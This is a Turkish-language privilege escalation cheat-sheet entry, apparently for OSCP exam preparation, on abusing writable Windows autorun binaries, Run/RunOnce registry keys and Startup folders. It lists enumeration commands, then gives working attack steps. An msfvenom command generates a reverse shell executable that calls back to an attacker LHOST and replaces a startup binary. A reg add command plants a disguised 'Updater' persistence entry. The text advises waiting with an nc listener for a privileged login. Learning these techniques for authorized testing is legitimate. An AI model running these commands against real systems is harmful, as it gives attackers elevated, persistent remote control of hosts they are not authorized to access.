PrivEsc ✓ EXAM-SAFE orta
Autoruns / Startup — Yazilabilir Otomatik Baslatma Binarileri
Run/RunOnce registry anahtarlarinda veya Startup klasorunde tanimli, ayricalikli bir kullanici/SYSTEM tarafindan tetiklenen binarilere yazma yetkimiz varsa, binaryi degistirip veya yeniden olusturup o kullanicinin oturum acmasiyla kod calistirabiliriz.
Bilgi: ÖN KOŞULLAR
- Dusuk yetkili shell
- Hedef binary/klasor uzerinde yazma izni
- Tetikleyen ayricalikli kullanicinin oturum acmasi (veya reboot)
┌──
Komutlar
cmd ✓ EXAM-SAFE user
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run Makine genelinde calisan otomatik baslatma girdilerini listele HackTricks — Windows Local Privilege Escalation (Run / RunOnce)
cmd ✓ EXAM-SAFE user
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce RunOnce girdilerini listele HackTricks — Windows Local Privilege Escalation
cmd ✓ EXAM-SAFE user
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mevcut kullanici icin Run girdilerini listele HackTricks — Windows Local Privilege Escalation
powershell ✓ EXAM-SAFE user
Get-CimInstance Win32_StartupCommand | Select-Object Name,Command,Location,User | Format-List Tum autorun konumlarini (Run keys + Startup klasoru) tek komutta toparla HackTricks — Windows Local Privilege Escalation
powershell ✓ EXAM-SAFE user
icacls "C:\Program Files\Vendor\autostart.exe" Autorun binary'sinin ACL'sini kontrol et; (M),(F),(W) bizim grup icin yazma demek HackTricks — Windows Local Privilege Escalation
powershell ✓ EXAM-SAFE user
Get-Acl 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' | Format-List Run anahtarinin kendisi yazilabilir mi? Yeni autorun girdisi ekleyebilir miyiz? HackTricks — Windows Local Privilege Escalation
msfvenom ✓ EXAM-SAFE
msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o autostart.exe Autorun binary'sinin yerine konacak reverse shell uret HackTricks — Windows Local Privilege Escalation
cmd ✓ EXAM-SAFE user
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\autostart.exe" /f Run anahtari yazilabilirse yeni autorun girdisi ekle HackTricks — Windows Local Privilege Escalation
Genel Bakis
Windows oturum acildiginda veya sistem baslatilirken bir dizi konumdan program calistirir: Run/RunOnce registry anahtarlari (HKLM ve HKCU), Startup klasorleri ve benzeri. Bu konumlarda tanimli bir binary’ye yazma yetkimiz varsa veya Run anahtarinin kendisi yazilabilirse, ayricalikli bir kullanici (veya SYSTEM) oturum actiginda bizim kodumuz onlarin yetkisiyle calisir.
Tespit / Enumerasyon
Get-CimInstance Win32_StartupCommandile tum autorun girdilerini ve hangi kullanici/konumda olduklarini topla.- Her registry anahtarini ayri ayri sorgula (HKLM > HKCU; HKLM daha degerlidir cunku tum kullanicilar/SYSTEM icin gecerli).
- Tespit edilen her binary icin
icaclsile ACL’yi kontrol et. Hedef:BUILTIN\Users,Authenticated Usersveya kendi kullanicimiz icin(M)modify /(F)full /(W)write izinleri. - winPEAS ve PowerUp (
Get-ModifiableRegistryAutoRun,Get-RegistryAlwaysInstallElevated) bu kontrolleri otomatik yapar.
Sömürü Yollari
- Yazilabilir binary: Orijinal exe’yi yedekleyip yerine msfvenom payload’ini koyun. Ayricalikli kullanici giris yapinca shell gelir.
- Yazilabilir Run anahtari:
reg addile yeni bir girdi ekleyip kendi payload yolumuzu gosteririz. - Startup klasoru yazilabilir:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startupyazilabilirse buraya bir.exe/.lnk/.batbirakilir.
Notlar
- HKLM
Rungirdileri tipik olarak yonetici/SYSTEM tarafindan tetiklenir — bu yuzden en degerli hedeftir. - Tetiklenme icin genelde hedef kullanicinin yeniden oturum acmasi gerekir; OSCP lab’larinda bazen reboot/login simule edilir, sabirla
ncdinleyicisini acik tutun. - Degisiklikleri geri almak (orijinal binary’yi restore etmek, eklenen registry girdisini silmek) cleanup asamasi icin onemlidir.
┌──
Kaynaklar
↗ HackTricks — Windows Local Privilege Escalation (Run at startup)PayloadsAllTheThings — Windows Privilege Escalation (Startup Applications)Microsoft Docs — Run and RunOnce Registry Keys